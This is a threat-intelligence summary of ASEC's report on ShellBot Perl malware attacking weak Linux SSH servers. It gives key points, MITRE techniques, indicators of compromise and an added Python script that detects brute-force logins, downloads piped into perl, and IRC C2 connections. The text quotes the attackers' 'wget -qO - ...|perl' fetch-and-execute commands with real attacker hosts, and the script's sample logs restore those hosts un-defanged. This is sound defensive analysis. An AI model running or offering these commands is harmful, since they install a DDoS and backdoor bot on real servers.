ShellBot Malware Being Distributed to Linux SSH Servers – ASEC BLOG

ShellBot is being distributed to poorly managed Linux SSH servers, leveraging SSH credential brute-forcing and IRC-based C2 channels to control infected hosts. The report details three ShellBot variants (LiGhT’s Modded perlbot v2, DDoS PBot v2.0, and PowerBots), how attackers operate, and recommended defenses. Hashtags: #ShellBot #PerlBot #LiGhTsModdedperlbotV2 #DDoSPBotv2 #PowerBots #GohacK #LinuxSSH

Keypoints

  • ShellBot (Perl-based) malware is being installed on poorly managed Linux SSH servers and uses IRC to communicate with the C2 server.
  • Threat actors gain access by scanning for SSH with port 22 and attempting dictionary attacks using common credentials.
  • There are multiple ShellBot variants, notably LiGhT’s Modded perlbot v2, DDoS PBot v2.0, and PowerBots, each offering different command sets for DDoS and backdoor actions.
  • LiGhT’s Modded perlbot v2 includes multiple installation commands, C2 URLs, IRC channels, and DDoS/backdoor capabilities.
  • DDoS PBot v2.0 features IRC-based control with admin verification for channel commands and a mix of system info, DDoS, and utility commands.
  • PowerBots present a simpler backdoor focus with reverse shell and file download capabilities, plus basic DDoS-related commands and a dedicated C2 channel.
  • Defensive guidance emphasizes strong passwords, patching, firewall protection, and keeping malware-detection tools updated; IOC details are provided (MD5s, download URLs, and C2 URLs).

MITRE Techniques

  • [T1110] Brute Force – After scanning for hosts with port 22 open, the attackers run a dictionary attack against SSH: “threat actors search for systems where the SSH service is active and use a list of commonly used SSH account credentials to initiate their dictionary attack.”
  • [T1046] Network Service Scanning – The actors perform scanning to identify systems with SSH open, i.e., “After scanning systems that have operational port 22s…”
  • [T1071] Application Layer Protocol – ShellBot “uses an IRC protocol to communicate with C&C servers”, receiving commands and transmitting or storing data via IRC channels.
  • [T1059.004] Unix Shell – Installation and operation rely on shell commands such as wget and perl to fetch and execute payloads. – “wget -qO - x-x-x[.]online/ak|perl”
  • [T1105] Ingress Tool Transfer – The malware downloads payloads from remote servers (e.g., wget commands fetching Perl payloads). – “wget -qO - 80.94.92[.]241/bash|perl”
  • [T1070] Indicator Removal on Host – DDoS PBot v2.0 and related variants include log-related commands such as LogCleaner, indicating attempts to hide activity. – “LogCleaner”
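The three observable stages above (SSH dictionary attack, download piped straight into perl, outbound IRC C2 on port 6667) can be turned into simple host-log detections. The following is an added example, not code from the ASEC article or from ShellBot; the log format, the 203.0.113.5 source address and the mirror.example URL are constructed, and the hostnames and IPs are the page's defanged IOCs with the [.] restored.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not from the article). Three record kinds are
# mixed: sshd auth results, process executions, and outbound connections.
SAMPLE_LOGS = [
    *[f"auth: Failed password for root from 203.0.113.5 port {51100 + i} ssh2" for i in range(6)],
    "auth: Accepted password for root from 203.0.113.5 port 51140 ssh2",
    'exec: uid=0 cmd="sh -c wget -qO - x-x-x.online/ak|perl"',
    'exec: uid=0 cmd="sh -c wget -qO - 80.94.92.241/bash|perl"',
    'exec: uid=1000 cmd="wget -qO - https://mirror.example/pkg.tar.gz"',  # benign download, no pipe
    "conn: uid=0 dst=164.90.240.68:6667 proto=tcp",
    "conn: uid=1000 dst=93.184.216.34:443 proto=tcp",
]

# Rule 1: a downloader piped directly into an interpreter (the page's "wget -qO - ...|perl").
PIPE_TO_INTERPRETER = re.compile(r"\b(?:wget|curl)\b[^|;]*\|\s*(?:perl|python3?|sh|bash)\b")
# Rule 2: outbound connection to the plain-text IRC port used by the listed C2 endpoints.
IRC_CONN = re.compile(r"dst=(?P<ip>[\d.]+):6667\b")
# Rule 3: many failed SSH logins from one source followed by a success for the same user.
AUTH = re.compile(r"(?P<result>Failed|Accepted) password for (?P<user>\S+) from (?P<ip>[\d.]+)")
FAIL_THRESHOLD = 5  # assumption: tune to the host's normal failure rate

def detect(lines):
    """Return (rule, detail) tuples, in log order, for every suspicious event."""
    hits = []
    failures = defaultdict(int)  # (source ip, user) -> failed attempts seen so far
    for line in lines:
        if m := PIPE_TO_INTERPRETER.search(line):
            hits.append(("download_piped_to_interpreter", m.group(0)))
        if m := IRC_CONN.search(line):
            hits.append(("irc_c2_connection", m.group("ip")))
        if m := AUTH.search(line):
            key = (m.group("ip"), m.group("user"))
            if m.group("result") == "Failed":
                failures[key] += 1
            elif failures[key] >= FAIL_THRESHOLD:
                hits.append(("ssh_bruteforce_success", f"{key[1]}@{key[0]} after {failures[key]} failures"))
    return hits

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_LOGS):
        print(f"{rule}: {detail}")
```

A successful login after the threshold is the high-value signal; the failed attempts alone are background noise on any internet-facing SSH host.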

Indicators of Compromise

  • [MD5] – ShellBot sample hashes identified in the article – bef1a9a49e201095da0bb26642f65a78, 3eef28005943fee77f48ac6ba633740d, and 6 more hashes
  • [Download URL] – Malware payload URLs – x-x-x[.]online/ak, 193.233.202[.]219/mperl, and 5 more URLs
  • [C2 URL] – Command-and-control endpoints – 164.90.240[.]68:6667, 206.189.139[.]152:6667, and 3 more
  • [Filename] – Installed/used filenames – ak, per, mperl, niko1, bash, test.jpg, dred, ff (examples shown; 2 more filenames listed in article)
  • [Domain] – Domains referenced for C2 or download hosts – gsm.ftp[.]sh, and 1 more domain (in the article)

Read more: https://asec.ahnlab.com/en/49769/comment-page-2/#comments